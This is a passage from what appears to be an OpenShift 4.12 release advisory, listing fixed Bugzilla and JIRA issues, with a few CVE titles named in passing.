- Changing `spec.host` field on any of routes in the openshift-console namespace wont trigger sync loop2117738 - Plugin page error boundary message is not cleared after leaving page2117749 - Bump to latest k8s.io 1.24 release2117822 - oc adm release extract should handle ccoctl2118286 - KCMO should not be dependent on monitoring stack2118318 - kube-controller-manager resource quota controller needs to stop watching all events2118550 - [capi] azure and vsphere image in payload2118563 - [OSP][SDN] The displayed IP Capacity is not consistent with port allowed maximum addresses2118625 - [Nutanix] ccoctl panics if nutanix credentials source file and openshift credentials requests files are in the same directory2124668 - CVE-2022-32190 golang: net/url: JoinPath does not strip relative path components in all circumstances2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps2135339 - CVE-2022-41316 vault: insufficient certificate revocation list checking2161287 - CVE-2023-0296 openshift: etcd grpc-proxy vulnerable to The Birthday attack against 64-bit block cipher5. JIRA issues fixed (https://issues.jboss.org/):OCPBUGS-1000 - Allow scale-down of unhealthy member when it doesn't violate quorumOCPBUGS-1004 - The error message of "opm alpha render-veneer semver" is not correctOCPBUGS-1017 - Can't cancel login when using multi-clusterOCPBUGS-1029 - Developer catalog fails to loadOCPBUGS-1038 - Whereabouts reconciliation should be launched by the CNO when using a conflistOCPBUGS-1044 - There's an issue with node-exporter pods running when using a bare metal AMD EPYC setupOCPBUGS-1049 - Pod security policy change breaks cluster-ingress-operator's TestCanaryRoute E2E testsOCPBUGS-1067 - [vsphere-CSI-Driver-Operator] The storageclass "thin-csi" could not be re-created after deleting OCPBUGS-1068 - Correct namespace for SimpleContentAccessNotAvailableOCPBUGS-1069 - Update ODC ownersOCPBUGS-1076 - CNO in HyperShift management cluster is reconciling ovn-kubemaster in Hosted Control Plane namespace.OCPBUGS-1080 - It's not possible to share BMC secrets between BareMetalHostsOCPBUGS-1083 - e2e-aws-ovn-serial fails because of OVNKubernetesControllerDisconnectedSouthboundDatabaseOCPBUGS-1105 - Import a Devfile on a disconnected cluster with a proxy doesn?t workOCPBUGS-1106 - Devfile Catalog and Import a Devfile on a fully disconnected cluster should fail directly instead of timeout after 30secOCPBUGS-1132 - e2e: perfprof: unbreak the e2e-gcp PAO laneOCPBUGS-122 - Error: open /etc/nsswitch.conf: permission denied and Error: open ./db-609956243: permission deniedOCPBUGS-1226 - OpenStack UPI scripts do not create server group for ComputesOCPBUGS-1227 - Node events create unnecessary CPU loadOCPBUGS-1231 - base image can't be fetched in a disconnected environmentOCPBUGS-1234 - AWS tagging limit hit issue when trying to add more than 10 tagsOCPBUGS-1237 - e2e-gcp-builds is permafailingOCPBUGS-1244 - Add PowerVS region mon01 to installerOCPBUGS-1247 - AWS Control Plane machine set are breaking single node clustersOCPBUGS-1256 - [CI-Watcher] e2e issue with tests: Using OLM descriptor components. Using OLM descriptor components deletes operandOCPBUGS-1257 - Keepalived health check causes unnecessary VIP flapping when HAProxy is healthyOCPBUGS-1263 - cri-o should report the stage of container and pod creation it's stuck atOCPBUGS-1268 - HelmChartRepositories has no action menu if the default repo is disabledOCPBUGS-1274 - machine-api-termination-handler Pods don't launch on tainted spot instancesOCPBUGS-1290 - Update Kafka Sink text descriptionOCPBUGS-1318 - Dual stack cluster fails on installation when multi-path routing entries existOCPBUGS-1321 - node_exporter collects metrics for "virtual" network interfacesOCPBUGS-1324 - Clusters with a custom osImage cannot be upgradedOCPBUGS-1329 - etcd and kube-apiserver pods get restarted due to failed liveness probes while deleting/re-creating pods on SNOOCPBUGS-1351 - health_statuses_insights metrics is showing disabled rules in "total"OCPBUGS-1353 -  ETCD Operator goes degraded when a second internal node ip is added OCPBUGS-1361 - Expect more detail info when report vSphere privilege alert OCPBUGS-1364 - Improve prometheus-adapter consistencyOCPBUGS-1402 - panic in cvo podOCPBUGS-1409 - E2E: intermittent failure is seen on tests for devfileOCPBUGS-1416 - ODC add-page e2e tests doesn't pass (outdated checks)OCPBUGS-1417 - Disconnected Openshift cluster on AWS having problem with manual egress IP assignmentOCPBUGS-1421 - Document how to use RWX vSphere volumesOCPBUGS-1429 - get updated rpm-ostree in 4.12 bootimagesOCPBUGS-1434 - Downstream Autoscaling Eviction Annotation to OCP 4.12OCPBUGS-1437 - OLM Reports ResolutionFailed when there are multiple upgrade paths between channel entriesOCPBUGS-1456 - Cluster operator-related tests failing on techpreview because of "platform-operators-aggregated"OCPBUGS-1470 - i18n: Incorrect plural for maxUnavailable pod countOCPBUGS-1479 - PDB list page should only show Create Pod button to user has sufficient permissionOCPBUGS-1482 - Can't install clusters with schedulable mastersOCPBUGS-1484 - Remove policy/v1beta1 in 4.11 and laterOCPBUGS-1489 - [vsphere] one vm folder is not deleted when destroying ocp cluster configured region/zoneOCPBUGS-1498 - e2e: performance: Verify kernel param rcutree.kthreadOCPBUGS-1502 - PodNetworkConnectivityCheck gatherer reads too much data into memoryOCPBUGS-1503 - configure-ovs.sh fails on unrelated, invalid connection files (non-existing interfaces)OCPBUGS-1505 - Booting live ISO: /dev/sr0 already mounted or mount point busyOCPBUGS-1512 - [OCP 4.12] Fix generate script in CBOOCPBUGS-1515 -  Join network CIDR not accept v6InternalSubnet fdxx::/48OCPBUGS-1522 - Regular user cannot open the debug container from pods they createdOCPBUGS-1533 - sdn rebase to 1.25OCPBUGS-1549 - DNS operator does not reconcile the openshift-dns namespaceOCPBUGS-1554 - Bump cluster-ingress-operator to k8s 1.25OCPBUGS-1558 - Bump cluster-dns-operator to k8s 1.25OCPBUGS-1569 - OBC and OB option showing twice to user of a Project on ConsoleOCPBUGS-1570 - Event Sources not shown in topologyOCPBUGS-1616 - masters unavailable & mco degraded in bootstrap techpreview jobsOCPBUGS-1621 - The CSV of the operator does not have timestamp OCPBUGS-1629 - Facing issue while configuring egress IP pool in OCP cluster which uses STSOCPBUGS-1636 - The platform-operators-aggregated cannot be created after enabling TechPreviewNoUpgradeOCPBUGS-1641 -  irqbalance: add unit to clear the cpu ban listOCPBUGS-1645 - CPMS should handle clusters where Masters are not indexed from 0OCPBUGS-165 - Spike in pod-latency graph observed due to ovnkube-master restartsOCPBUGS-1677 - CI: Backend unit tests fails because devfile registry was updated (fix assertion)OCPBUGS-1678 - CI: Backend unit tests fails because devfile registry was updated (mock response)OCPBUGS-169 - Console e2e tests broken due to pod security admission controllerOCPBUGS-1698 - [vsphere] Installer get panic error when no setting platform.vsphere.failureDomains.topology.networksOCPBUGS-1705 - OVN-Kubernetes master crashing due to too long ACL names during upgradeOCPBUGS-1708 - console.openshift.io/use-i18n false in v1alpha API is converted to "" in the v1 APi, which is not a valid value for the enum type declared in the code.?OCPBUGS-171 - VirtualMediaViaExternalNetwork is broken with virtual media TLSOCPBUGS-1717 - Image registry panics while deploying OCP in me-central-1 AWS regionOCPBUGS-1718 - prometheus-k8s-0 ends in CrashLoopBackOff with evel=error err="opening storage failed: /prometheus/chunks_head/000002: invalid magic number 0" on SNO after hard reboot testsOCPBUGS-1730 - Bump openshift-router to k8s 1.25OCPBUGS-1731 - Rebase CoreDNS to 1.10.0, based on k8s 1.25OCPBUGS-1736 - cncc crashloop in proxy deploymentsOCPBUGS-1746 - Update the Github App events and permissionsOCPBUGS-1776 - Duplicate "Getting Started" notification will show on Search page for normal userOCPBUGS-1789 - Users can't silence alerts from the dev console when dedicated UWM Alertmanager is deployedOCPBUGS-1799 - Ironic API proxy pods crash loop if IPv6 is usedOCPBUGS-180 - Name of "Role" should keep pace with the name in CLI OCPBUGS-1806 - OCP cluster install on baremetal fails when hostname of master nodes does not include the text "master" (take 2)OCPBUGS-1810 - must gather for gather_ingress_node_firewall breaks with permission issuesOCPBUGS-1824 - Systemd service been deactivated in limited network environmentOCPBUGS-1825 - Ingress Node Firewall rule becomes non-functional when daemons and controller manager deployment are re-deployedOCPBUGS-1827 - knative service e2e tests are failingOCPBUGS-183 - Log line numbers overlap with cut-off rule when number is too bigOCPBUGS-1831 - failed to run command in pod with network-tools script pod-run-netns-command locallyOCPBUGS-184 - [OCP web console]  Wrong message "404: Not found" while the user selects an installed operator and navigates from operator hub to installed operator page.OCPBUGS-1853 - [OVNK] ARP doesn't exist for v6: https://github.com/j-keck/arping/ OCPBUGS-1856 - [IBMCloud]  install private cluster need manually add a rule to the security group for *sg-kube-api-lbOCPBUGS-1877 - download 'aliyun'OCPBUGS-1880 - Openshift version upgrade cause multiple worker go in draining node OCPBUGS-1881 - [vSphere] cluster destroy get stuck if vm have not tag attachedOCPBUGS-1896 - [CORS-2260] "create install-config" got error 'credentialsMode: Forbidden: environmental authentication is only supported with Manual credentials mode'OCPBUGS-1900 - Bootstrap error in SNO installationOCPBUGS-1904 - CSI driver operators are degraded without "CSISnapshot" capabilityOCPBUGS-1912 - downstream `opm alpha diff` moving to `oc-mirror`OCPBUGS-1913 - Agent Installer: Do not fail on deprecated apiVip and ingressVip valuesOCPBUGS-1916 - Workloads list page has different HPA action items from details page when All Projects selectedOCPBUGS-193 - Kebab menu not working properly for helm repositoryOCPBUGS-194 - Layout for API Explorer page is incorrectOCPBUGS-1941 - [4.12] Bootimage bump trackerOCPBUGS-1949 - kube-controller log gatherer should limit number of bytes readOCPBUGS-1950 - Devfile samples (in Developer Catalog) link doesn't include the current selected namespaceOCPBUGS-1962 - Controller and speakers are not created with tolerations  effect is NoScheduleNoSchedule and tolerationSeconds is set 10OCPBUGS-1979 - Update openshift/etcd Go version to 1.16OCPBUGS-198 - Kuryr-Controller Restarting on KuryrPort with missing podOCPBUGS-1992 - [osp][octavia lb] failing to create floating IP for external LBOCPBUGS-1994 - Unrevert needed for jsonnet deps update PROCPBUGS-2004 - egressip healthcheck through GRPC on dualstack cluster only uses v6 address when trying to re-connect to egressIP nodeOCPBUGS-2009 - User should be warned that MetalLB controller pod config node affinity cannot have weight 0OCPBUGS-2010 - [noop][4.12] ironic clear_job_queue and reset_idrac pending issuesOCPBUGS-2029 - proxy config in installconfig fails to be appliedOCPBUGS-2052 - [4.12] boot sequence override request fails with Base.1.8.PropertyNotWritable on Lenovo SE450OCPBUGS-2063 - List pages in pipelines is taking more time to load when there are too many itemsOCPBUGS-2071 - revert "force cert rotation every couple days for development" in 4.12OCPBUGS-2075 - Do not show notification switch for the alert rule which have no alerts associatedOCPBUGS-2076 - CI AWS CCM cluster install failureOCPBUGS-2079 - systemReserved:ephemeral-storage in KubeletConfig doesn't work as expectedOCPBUGS-208 - Race condition when creating / deleting mac_address_pairsOCPBUGS-2086 - Detect failure to prepare installationOCPBUGS-2100 - Alert icon color is black in the Topology list view OCPBUGS-2102 - Resource quota e2e tests fails after latest changes to masterOCPBUGS-212 - co/kube-controller-manager degraded: GarbageCollectorDegraded: error fetching rules: Get "https://thanos-querier.openshift-monitoring.svc:9091/api/v1/rules": dial tcp 172.30.153.28:9091: connect: cannot assign requested addressOCPBUGS-2122 - machine-config-daemon failed to update the OS for cluster running behind proxyOCPBUGS-2125 - CVO skips reconciling the installed optional resources in the 4.11 to 4.12 upgradeOCPBUGS-2138 - Get OSImageURL override related metric data available in telemetryOCPBUGS-2151 - machine-api-operator degraded during 3+1 deployment due to minimum worker replica count is 2OCPBUGS-2152 - RHCOS VM fails to boot on IBM Power (ppc64le) - 4.12OCPBUGS-2155 - Etcd scaling test was mistakenly added to the parallel suiteOCPBUGS-2157 - Documentation for cleaning crio produces kubelet errorsOCPBUGS-2158 - Track changes of serviceAccountIssuer in operator statusOCPBUGS-216 - kuryr-controller timing out liveness probeOCPBUGS-2167 - Workload hints feature breaks backwards compatibilityOCPBUGS-2175 - Windows to linux networking broken since downstream OVN mergeOCPBUGS-2181 - e2e tests: Installs Red Hat Integration - 3scale operator test is failing due to change of Operator nameOCPBUGS-2195 - NPE on visiting topology for ns which got deletedOCPBUGS-2197 - [upgrade 4.11.z to 4.12 nightly] rpm-ostree update via container failedOCPBUGS-2219 - ConsolePlugin CRs cannot be garbage collected due to missing spec.i18n.loadType valueOCPBUGS-2223 - Default catalogSources are not updated to 4.12OCPBUGS-2227 - VPA Operator not enabled in 4.12OCPBUGS-224 - Missing  $SEARCH domain in /etc/resolve.conf for OCP v4.9.31 cluster OCPBUGS-2249 - Conditional gatherer cluster_version_matches issuesOCPBUGS-2262 - [gcp][CORS-1774] "platform.gcp.publicDNSZone" and "platform.gcp.privateDNSZone" should be for existing DNS zonesOCPBUGS-2265 - Allow passing documentation links for alertsOCPBUGS-2269 - "error: No enabled repositories" on upgrade with kernelType: realtime enabledOCPBUGS-2301 - [gcp][CORS-1774] with "createFirewallRules: Enabled", after successful "create cluster" and then "destroy cluster", the created firewall-rules in the shared VPC are not deletedOCPBUGS-2316 - Ingress-node-Firewall:Mixing ICMP v4 and v6 config causes a panicOCPBUGS-2322 - Kuryr does not accept application credentialsOCPBUGS-2325 - Add e2e test cases for INF spec.ingressOCPBUGS-2327 - Add validation for releaseImage and mirrorOCPBUGS-2328 - Panic observed: runtime error: index out of rangeOCPBUGS-2330 - events.events.k8s.io is forbidden: User "system:serviceaccount:openshift-kube-descheduler-operator:openshift-descheduler-operand" cannot create resource "events" in API group "events.k8s.io" in the namespace "e2e-test-default-b6y9atnu-jxz6p"OCPBUGS-2334 - NE-956: Configurable LB Source Ranges breaks TestScopeChangeOCPBUGS-2338 - Confusing error messages when missing VIPsOCPBUGS-2340 - OnDelete update strategy cannot work when master machines are not index as 0, 1, 2OCPBUGS-2346 - Remove namespace and name from gathered DVO metricsOCPBUGS-2354 - co/storage is not available due to csi driver not have proxy setting on ibm cloudOCPBUGS-236 - custom ingress-controller can't be deletedOCPBUGS-2360 - [IPI on Baremetal] ipv6 support issue in metal3-httpdOCPBUGS-2362 - OVN-K alerts must be set to the correct severity levelOCPBUGS-2369 - NPE on topology if creates a k8s svc and KSVC which has no metadata in templateOCPBUGS-2372 - Duplicate addresses when the controller is restartedOCPBUGS-2373 - When changing a lb service to another type, the freed ip is not reusedOCPBUGS-238 - ReEnable e2e tests for knativeOCPBUGS-2396 - FIPS jobs are broken after images rebuilt with golang 1.19OCPBUGS-2435 - Nil-pointer dereference in TestRouterCompressionOperation on e2e-gcp-operatorOCPBUGS-2436 - Installer fails to create ingress.config.openshift.io/cluster on AWS because of missing spec.loadBalancer.platform.aws.typeOCPBUGS-2437 - Clusters with large numbers of CSVs can cause crashloop, block upgradesOCPBUGS-2438 - Help popovers cause error on Observe > Alerting pagesOCPBUGS-2446 - Control Plane Machine Set does not expose errorsOCPBUGS-2455 - Pods and PDBs list page just reports 'Not found' when no Pod/PDBOCPBUGS-246 - Incorrect retry cause false positive in CNF testsOCPBUGS-2469 - ControlPlaneMachineSets are not included in must-gathersOCPBUGS-2478 - i18n translation missing in "Remove component node from application" modalOCPBUGS-2495 - 'oc login' should be robust in the face of gather failuresOCPBUGS-2508 - Worker creation fails within provider networks (as primary and secondary)OCPBUGS-2512 - apiserver pods cannot reach etcd on single node IPv6 cluster: transport: authentication handshake failed: x509: certificate is valid for ::1, 127.0.0.1, ::1, fd69::2, not 2620:52:0:198::10"OCPBUGS-2558 - [RFE] Add new Azure instance types to the official "tested/supported" listOCPBUGS-256 - intra namespace allow network policy doesn't work after applying ingress&egress deny all network policyOCPBUGS-2592 - CVO hot-loops on Deployment manifestsOCPBUGS-262 - downloading govc is impacted by github rate limitingOCPBUGS-2621 - Enable TechPreview cause cluster error on single node clusterOCPBUGS-2635 - Ingress operator degraded during 3+1 deployment due to insufficient worker nodesOCPBUGS-2638 - Switch libvirt VM's to vnc graphic modeOCPBUGS-2651 - Pipeline Run nodes should show focus borderOCPBUGS-2654 - Console OLM Integration Tests Reference Operator Not Present in 4.12 Certified Operators CatalogSourceOCPBUGS-2656 - VPA E2Es fail due to CSV name mismatchOCPBUGS-268 - vsphere: installer for vsphere does not have steal clock accounting enabledOCPBUGS-270 - Dev Catalog taking too much time to load in a complete disconnected clusterOCPBUGS-2726 - Descheduler SoftTopologyAndDuplicates uses Stategy RemovePodsViolatingTopologySpreadConstraint which has invalid mappingOCPBUGS-2741 - CPMS failureDomains is not keep consistent with master machines on heterogeneous cluster after upgrade from 4.11 to 4.12OCPBUGS-2757 - rebase should handle idempotencyOCPBUGS-2774 - [AWS][GCP] the new created nodes are not added to load balancerOCPBUGS-2775 - After added/removed label from a namespace, one stats of "route_metrics_controller_routes_per_shard" in Observe >> Metrics page aren't correctOCPBUGS-2779 - Import: Advanced option sentence is splited into two parts and headlines has no paddingOCPBUGS-2803 - Project auth cache sync blocks list handlerOCPBUGS-2822 - [4.12] EFS csi controller&driver pod are CrashLoopBackOff due to csi-driver container is not running on arm.OCPBUGS-2826 - ovnkube-trace: ofproto/trace fails for IPv6OCPBUGS-2837 - Excessive debug logsOCPBUGS-2848 - Routes per shard metric inaccurate if using matchExpressionOCPBUGS-2854 - Controlplanmachineset couldn't be created after deleting a machinesetOCPBUGS-2874 - Add Capacity button does not exist after upgrade OCP version [OCP4.11->OCP4.12]OCPBUGS-2896 - Refactor retry logic into a separate pkgOCPBUGS-2909 - Invalid documentation link in knative-plugin READMEOCPBUGS-2915 - InsightsRecommendationActive should link cluster-specific pageOCPBUGS-2918 - Update Prometheus AlertsOCPBUGS-2927 - CI jobs are failing with: admission webhook "validation.csi.vsphere.vmware.com" denied the requestOCPBUGS-2974 - administrator console, monitoring-alertmanager-edit user list or create silence, "Observe - Alerting - Silences" page is pendingOCPBUGS-2975 - PTP 4.12 - PTP - AMQ HTTP on event caused ptp stopped working after fresh deploymentOCPBUGS-2979 - [4.12] automatic replacement of an unhealthy member machineOCPBUGS-2984 - [RFE] 4.12 Azure DiskEncryptionSet static validation does not support upper-case lettersOCPBUGS-2995 - [4.12] Unable to gather OpenStack console logs since kernel cmd line has no console argsOCPBUGS-2997 - [4.12] Bootimage bump trackerOCPBUGS-2998 - OCP 4.12 Driver Toolkit (DTK) mismatch in kernel package and node kernel versionsOCPBUGS-3003 - Ignore non-ready endpoints when processing endpointslicesOCPBUGS-3019 - Ingress node firewall pod 's events container on the node causing pod in CrashLoopBackOff state when sctp module is loaded on nodeOCPBUGS-302 - openshift-install gather bootstrap panicsOCPBUGS-3022 - GCP: missing multiple regionsOCPBUGS-3028 - panic in WaitForBootstrapCompleteOCPBUGS-3035 - 4.12 backport: Multiple extra manifests in the same file are not applied correctlyOCPBUGS-3037 - [apiserver-auth] default SCC restricted allow volumes don't have "ephemeral" caused deployment with Generic Ephemeral Volumes stuck at PendingOCPBUGS-305 - Cluster-version operator ClusterOperator checks are unecessarily slow on updateOCPBUGS-3055 - 4.12 backport: Wait-for install-complete  did not exit upon completion.OCPBUGS-3071 - [4.12][AWS] curl network Loadbalancer always get "Connection time out"OCPBUGS-3075 - [4.12] ovn-k network policy racesOCPBUGS-3080 - [4.12] RPS hook only sets the first queue, but there are now manyOCPBUGS-3081 - monitor not working with UDP lb when externalTrafficPolicy: LocalOCPBUGS-3094 - [4.12] The control plane should tag AWS security groups at creationOCPBUGS-3111 - metal3 pod crashloops on OKD in BareMetal IPI or assisted-installer bare metal installationsOCPBUGS-3115 - [2117255] Failed to dump flows for flow sync, stderr: "ovs-ofctl: br-ext is not a bridge or a socket"OCPBUGS-3175 - CIRO unable to detect swift when it speaks HTTP2OCPBUGS-3177 - RHCOS 4.12/s390x kdump is failling, disable testOCPBUGS-3179 - Regression in ptp-operator conformance testsOCPBUGS-3194 - [4.12.z backport][4.8][OVN] RHEL 7.9 DHCP worker ovs-configuration fails OCPBUGS-3204 - Permission denied when write data to mounted gcp filestore volume instanceOCPBUGS-3208 - [4.12] SCOS build fails due to pinned kernelOCPBUGS-3249 - CVE-2022-27191 ose-installer-container: golang: crash in a golang.org/x/crypto/ssh server [openshift-4]OCPBUGS-3263 - The terraform binaries shipped by the installer are not statically linkedOCPBUGS-3265 - Console shouldn't try to install dynamic plugins if permissions aren't availableOCPBUGS-3276 - Pin down dependencies on CMO release 4.12OCPBUGS-3279 - Service-ca controller exits immediately with an error on sigtermOCPBUGS-3281 - OCP 4.10.33 uses a weak 3DES cipher in the VMWare CSI Operator for communication and provides no method to disable itOCPBUGS-3289 - [IBMCloud] Worker machines unreachable during initial bring upOCPBUGS-3293 - WriteRequestBodies audit profile records routes/status events at RequestResponse levelOCPBUGS-3297 - Bugfix in privileged-daemonset and better dependenciesOCPBUGS-3306 - Agent installer does not support dualstack VIPsOCPBUGS-3307 - [gcp] when the optional Service Usage API is disabled, IPI installation cannot succeedOCPBUGS-3311 - [alibabacloud] IPI installation failed with master nodes being NotReady and CCM error "alicloud: unable to split instanceid and region from providerID"OCPBUGS-3333 - Console should be using v1 apiVersion for ConsolePlugin modelOCPBUGS-3340 - Environment cannot find PythonOCPBUGS-3343 - [vsphere] installation fails when setting user-defined folder in failure domainOCPBUGS-3346 - [perf/scale] libovsdb builds transaction logs but throws them awayOCPBUGS-3348 - 4.12: When adding nodes, the overlapped node-subnet can be allocated.OCPBUGS-3352 - ClusterVersionRecommendedUpdate condition blocks explicitly allowed upgrade which is not in the available updatesOCPBUGS-3359 - Revert BUILD-407OCPBUGS-3363 - openshift-ingress-operator with mTLS does not download CRLOCPBUGS-3366 - Disconnected cluster installation fails with pull secret must contain auth for "registry.ci.openshift.org" OCPBUGS-3378 - [OVN]Sometimes after reboot egress node, egress IP cannot be applied anymore.OCPBUGS-3379 - [release-4.12] CephCluster and StorageCluster resources use the same pathsOCPBUGS-3390 - [release-4.12] 4.11 SNOs fail to complete install because of "failed to get pod annotation: timed out waiting for annotations: context deadline exceeded"OCPBUGS-3397 - Avoid re-metric'ing the pods that are already setup when ovnkube-master disrupts/reinitializes/restarts/goes through leader electionOCPBUGS-3398 - 4.12 backport: Unable to configure cluster-wide proxyOCPBUGS-3406 - [gcp][CORS-1774] with both "id" and "project" specified for "privateDNSZone", it seems installer doesn't horner "project"OCPBUGS-3425 - [release-4.12] Azure Disk CSI Driver Operator gets degraded without "CSISnapshot" capabilityOCPBUGS-3428 - [4.12] Skip broken [sig-devex][Feature:ImageEcosystem] testsOCPBUGS-3436 - domain 24 missing from phc2sys optionsOCPBUGS-3437 - cloud-network-config-controller not using proxy settings of the management clusterOCPBUGS-3442 - Datastore name is too longOCPBUGS-3443 - [4.12] Descheduler pod is OOM killed when using descheduler-operator profiles on big clustersOCPBUGS-3455 - track `rhcos-4.12` branch for fedora-coreos-config submoduleOCPBUGS-3459 - Installer does not always add router CA to kubeconfigOCPBUGS-346 - Failed to create volumesnapshotcontent for gcp-filestore-csi-driver-operatorOCPBUGS-3464 - IBM operator needs deployment manifest fixesOCPBUGS-3468 - Disable check_pkt_length in OVN-K for OvS Hardware Offload CasesOCPBUGS-3479 - [4.12] Baremetal Provisioning fails on HP Gen9 systems due to eTag handlingOCPBUGS-3483 - Minor test fixes related to getting updated profile and checking kubeletconfigurationOCPBUGS-3493 - [Ingress Node Firewall Operator] [Web Console] Allow user to override namespace where the operator is installed, currently user can install it only in openshift-operators nsOCPBUGS-3503 - CRD-based and openshift-apiserver-based Route validation/defaulting must use the shared implementationOCPBUGS-3504 - [4.12] Incorrect network configuration in worker node with two interfacesOCPBUGS-3510 - Update cluster-authentication-operator not to go degraded without consoleOCPBUGS-3515 - Need validation rule for supported archOCPBUGS-3519 - Assisted service should always use first matching mirror for release imageOCPBUGS-3520 - Install ends in preparing-failed due to container-images-available validationOCPBUGS-3523 - Operator attempts to render both GA and Tech Preview API ExtensionsOCPBUGS-3557 - [4.12] provisioning of baremetal nodes fails when using multipath device as rootDeviceHintsOCPBUGS-3571 - Placeholder bug for OCP 4.12.0 metadata releaseOCPBUGS-3639 - The architecture field in sig image definition for hyperVGeneration V1 needs to match rhcos_image architectureOCPBUGS-364 -  Update ose-baremetal-installer images to be consistent with ARTOCPBUGS-3650 - EUS upgrade stuck on worker pool update: error running skopeo inspect --no-tagsOCPBUGS-3651 - DaemonSet "/openshift-network-diagnostics/network-check-target" is not availableOCPBUGS-3658 - OVN-Kubernetes should not send IPs with leading zeros to OVNOCPBUGS-3663 - don't enforce PSa in 4.12OCPBUGS-3694 - [4.12] Router e2e: drop template.openshift.io apigroup dependencyOCPBUGS-3696 - Surface ClusterVersion RetrievedUpdates condition messagesOCPBUGS-3700 - [osp][octavia lb] NodePort allocation cannot be disabled for LB type svcsOCPBUGS-3754 - Create Alertmanager silence form does not explain the new "Negative matcher" optionOCPBUGS-3763 - PTP operator: Use priority class node criticalOCPBUGS-3770 - cvo pod crashloop during bootstrap: featuregates: connection refusedOCPBUGS-3772 - Default for spec.to.weight missing from Route CRD schemaOCPBUGS-3774 - Unable to use application credentials for Cinder CSI after OpenStack credentials updateOCPBUGS-3780 - Route CRD validation behavior must be the same as openshift-apiserver behaviorOCPBUGS-3786 - Should show information on page if the upgrade to a target version doesn't take effect.OCPBUGS-3798 - [4.12] Bump OVS control plane to get "ovsdb/transaction.c: Refactor assess_weak_refs."OCPBUGS-3811 - Automation Offline CPUs Test casesOCPBUGS-3824 - [4.12] Ipsec pods restart due to liveness probes fail in cluster with more than 150 +OCPBUGS-3837 - service account token secret referenceOCPBUGS-384 - GCP Filestore csi operator has wrong spec.description in csv filesOCPBUGS-3841 - Remove flowcontrol/v1beta1 release manifests in 4.12 and laterOCPBUGS-3851 - [4.12][Dual Stack] ovn-ipsec crashlooping due to cert signing issuesOCPBUGS-3871 - Container networking pods cannot be access hosted network pods on another node in ipv6 single stack clusterOCPBUGS-3874 - masters repeatedly losing connection to API and going NotReadyOCPBUGS-3875 - Route CRD host-assignment behavior must be the same as openshift-apiserver behaviorOCPBUGS-3878 - RouteTargetReference missing default for "weight" in Route CRD v1 schemaOCPBUGS-3881 - Revert Catalog PSA decisions for 4.12OCPBUGS-3884 - [Ingress Node Firewall] Change the logo used for ingress node firewall operatorOCPBUGS-3889 - Egress router POD creation is failing while using openshift-sdn network pluginOCPBUGS-3890 - [ibmcloud] unclear error msg when zones is not match with the Subnets in BYON installOCPBUGS-3899 - [2035720] [IPI on Alibabacloud] deploying a private cluster by 'publish: Internal' failed due to 'dns_public_record'OCPBUGS-392 - Setting disableNetworkDiagnostics: true does not persist when network-operator pod gets re-createdOCPBUGS-3927 - "Error loading" when normal user check operands on All namespacesOCPBUGS-3930 - Local Storage Operator (LSO) not available in OperatorHub for OCP 4.12 on Z ec.5 and rc.0 buildsOCPBUGS-3944 - Handle 0600 kubeconfigOCPBUGS-3956 - CNO reporting incorrect statusOCPBUGS-3958 - [4.12] Use kernel-rt from ose repoOCPBUGS-3966 - must-gather namespace should have ?privileged? warn and audit pod security labels besides enforceOCPBUGS-4001 - fix operator naming convention OCPBUGS-4004 - Consistent e2e test failure:Events.Events: event view displays created podOCPBUGS-4013 - On Make Serverless page, to change values of the inputs minpod, maxpod and concurrency fields, we need to click the ? + ? or ? - ', it can't be changed by typing in it.OCPBUGS-4035 - Topology gets stuck loadingOCPBUGS-4040 - Authentication operator doesn't respond to console being enabledOCPBUGS-4043 - [2109965] oci hook Low-latency-hooks causing high container creation times under platform cpu loadOCPBUGS-4048 - Prometheus doesn't reload TLS certificate and key files on diskOCPBUGS-4063 - Fails to deprovision cluster when swift omits 'content-type'OCPBUGS-4064 - Install failure in create-cluster-and-infraenv.serviceOCPBUGS-4068 - Shouldn't need to put host data in platform baremetal section in installconfigOCPBUGS-407 - [2116382] Setting a telemeter proxy in the cluster-monitoring-config config map does not work as expectedOCPBUGS-4083 - CCM not able to remove a LB in ERROR stateOCPBUGS-4097 - [IPI-BareMetal]: Dual stack deployment failed on BootStrap stage  OCPBUGS-4098 - [4.12] Egress IP Health Check Is Not Compatible With VF (Hardware Backed) Management PortOCPBUGS-4112 - Remove autoscaling/v2beta2 in 4.12 and laterOCPBUGS-4116 - Re-enable pipeline CI testsOCPBUGS-4117 - Re-enable serverless CI testsOCPBUGS-4118 - Kube-State-metrics pod fails to start due to panicOCPBUGS-4121 - [SNO] csi-snapshot-controller CO is degraded when upgrade from 4.12 to 4.13 and reports permissions issue. OCPBUGS-416 - [IBMCloud] The udevadm utility is missing in the IBM Cloud VPC block storage IPI imageOCPBUGS-418 - [OCP web console]  Search result doesn't clear when user clears name filter in one-shot for any resourcesOCPBUGS-4183 - Upgrades from 4.11.9 to latest 4.12.x Nightly builds do not succeedOCPBUGS-4189 - Route CRD vs. OCP defaulting disparityOCPBUGS-4193 - [4.12] etcd failure: failed to make etcd client for endpoints [https://[2620:52:0:1eb:367x:5axx:xxx:xxx]:2379]: context deadline exceeded OCPBUGS-4195 - PTP 4.12 Regression - CLOCK REALTIME status is locked when physical interface is downOCPBUGS-4199 - route-controller-manager not creating routes in 4.12OCPBUGS-421 - Disconnected IPI OCP 4.10.22 cluster install on baremetal fails when hostname of master nodes does not include the text "masterOCPBUGS-4218 - highperformance irq balancing support causes the /etc/sysconfig/irqbalance to slowly grow unboundedOCPBUGS-4223 - Fix tuning plugin vlan handlingOCPBUGS-4230 - CNCC: Wrong log format for Azure lockingOCPBUGS-4234 - Updating ose-cloud-network-config-controller images to be consistent with ARTOCPBUGS-4235 - Updating ose-cloud-network-config-controller images to be consistent with ARTOCPBUGS-4250 - Backport PodNetworkConnectivityCheck for must-gatherOCPBUGS-4251 - HyperShift control plane operators have wrong priorityClassOCPBUGS-426 - [OSP][OVN]unable to create logical router policy for egressIP after update duplicate IP to uniq oneOCPBUGS-428 - Insights Operator should collect helm upgrade and uninstall metricOCPBUGS-4286 - [4.12] ovn-kubernetes ovnkube-master containers crashlooping after 4.11.0-0.okd-2022-10-15-073651 updateOCPBUGS-4292 - Backport specify resources.requests for operator podOCPBUGS-4299 - Backport Specify resources.requests for operator podOCPBUGS-4303 - Backport Specify resources.requests for operator podOCPBUGS-4308 - sanitize agent-gather outputOCPBUGS-431 - Nutanix platform validations run at `create manifests` stageOCPBUGS-4311 - [4.12] 